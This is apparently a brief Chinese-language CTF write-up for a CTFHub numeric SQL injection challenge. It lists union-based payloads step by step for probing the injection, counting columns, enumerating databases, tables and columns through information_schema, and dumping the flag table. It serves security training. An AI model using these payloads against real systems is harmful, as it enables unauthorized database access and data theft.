injection
主页是这个样子
判断注入类型 数字型
id=1 and 1=1#
id=1 and 1=2#
判断列数 两列
id=1 order by 2#
查询是否有显示位 union联合查询注入 2号位
id=1 union select 1,2#
查询数据库 ctfhub、informaion_schema
id=1 union select 1,(select concat(schema_name) from information_schema.schemata limit 0,1)#
id=1 union select 1,(select concat(schema_name) from information_schema.schemata limit 1,1)#
查询表(ctfhub) flag、info、
id=1 union select 1,(select concat(table_name) from information_schema.tables where table_schema='ctfhub' limit 0,1)#
id=1 union select 1,(select concat(table_name) from information_schema.tables where table_schema='ctfhub' limit 1,1)#
查询字段(flag) flag
id=1 union select 1,(select concat(column_name) from information_schema.columns where table_name='flag' limit 0,1)#
dump数据
id=1 union select 1,(select flag from flag)#